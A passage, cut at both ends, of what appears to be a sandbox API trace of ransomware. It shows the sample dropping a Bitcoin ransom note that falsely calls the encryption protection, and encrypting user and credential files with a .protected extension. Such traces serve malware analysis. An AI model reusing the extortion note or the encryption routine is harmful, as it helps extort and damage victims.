Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.001] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0095.001] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.001] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0095.001] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.002] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0095.002] CloseHandle (hObject=0x154) returned 1 [0095.002] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0095.002] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0095.002] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\RESTORE_FILES.txt") returned 107 [0095.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0095.002] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.002] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0095.003] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.003] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0095.003] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.003] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0095.003] CloseHandle (hObject=0x150) returned 1 [0095.003] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.003] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Windows") returned -1 [0095.003] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Program Files") returned 1 [0095.003] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Program Files (x86)") returned 1 [0095.003] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="$Recycle.bin") returned 1 [0095.003] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="System Volume Information") returned 1 [0095.003] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 97 [0095.003] StrStrIW (lpFirst="Window Switcher.lnk", lpSrch=".protected") returned 0x0 [0095.003] lstrcmpW (lpString1="Window Switcher.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0095.003] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0095.003] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0095.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0095.004] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 97 [0095.004] StrStrW (lpFirst="Window Switcher.lnk", lpSrch=".txt") returned 0x0 [0095.004] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 97 [0095.004] StrStrW (lpFirst="Window Switcher.lnk", lpSrch=".rar") returned 0x0 [0095.004] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 97 [0095.004] StrStrW (lpFirst="Window Switcher.lnk", lpSrch=".zip") returned 0x0 [0095.004] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x110, lpOverlapped=0x0) returned 1 [0095.005] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffef0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.005] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x110, lpOverlapped=0x0) returned 1 [0095.005] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.005] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0095.005] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0095.005] CloseHandle (hObject=0x150) returned 1 [0095.005] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.protected") returned 107 [0095.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.protected")) returned 1 [0095.006] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0095.006] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0095.006] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\RESTORE_FILES.txt") returned 95 [0095.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0095.006] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.006] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0095.007] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.007] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0095.007] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.007] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0095.007] CloseHandle (hObject=0x14c) returned 1 [0095.008] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0095.008] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0095.008] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt") returned 82 [0095.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0095.009] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.009] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0095.009] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.009] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0095.010] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.010] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0095.010] CloseHandle (hObject=0xd8) returned 1 [0095.010] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0095.010] lstrcmpiW (lpString1="Protect", lpString2="Windows") returned -1 [0095.010] lstrcmpiW (lpString1="Protect", lpString2="Program Files") returned 1 [0095.010] lstrcmpiW (lpString1="Protect", lpString2="Program Files (x86)") returned 1 [0095.010] lstrcmpiW (lpString1="Protect", lpString2="$Recycle.bin") returned 1 [0095.010] lstrcmpiW (lpString1="Protect", lpString2="System Volume Information") returned -1 [0095.010] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect") returned 54 [0095.010] lstrcmpW (lpString1="Protect", lpString2=".") returned 1 [0095.010] lstrcmpW (lpString1="Protect", lpString2="..") returned 1 [0095.010] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*") returned 56 [0095.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0095.010] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.010] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.010] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.010] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.010] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.010] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\.") returned 56 [0095.010] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.011] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.011] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.011] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0095.011] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0095.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.011] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0095.011] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.011] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.011] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.011] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.011] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.011] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\..") returned 57 [0095.011] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.011] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.011] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.011] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.011] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0095.011] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0095.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.011] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0095.011] lstrcmpiW (lpString1="CREDHIST", lpString2="Windows") returned -1 [0095.011] lstrcmpiW (lpString1="CREDHIST", lpString2="Program Files") returned -1 [0095.011] lstrcmpiW (lpString1="CREDHIST", lpString2="Program Files (x86)") returned -1 [0095.011] lstrcmpiW (lpString1="CREDHIST", lpString2="$Recycle.bin") returned 1 [0095.011] lstrcmpiW (lpString1="CREDHIST", lpString2="System Volume Information") returned -1 [0095.011] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 63 [0095.012] StrStrIW (lpFirst="CREDHIST", lpSrch=".protected") returned 0x0 [0095.012] lstrcmpW (lpString1="CREDHIST", lpString2="RESTORE_FILES.txt") returned -1 [0095.012] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0095.012] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0095.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0095.012] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 63 [0095.012] StrStrW (lpFirst="CREDHIST", lpSrch=".txt") returned 0x0 [0095.012] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 63 [0095.012] StrStrW (lpFirst="CREDHIST", lpSrch=".rar") returned 0x0 [0095.012] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned 63 [0095.012] StrStrW (lpFirst="CREDHIST", lpSrch=".zip") returned 0x0 [0095.012] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x18, lpOverlapped=0x0) returned 1 [0095.013] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.013] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18, 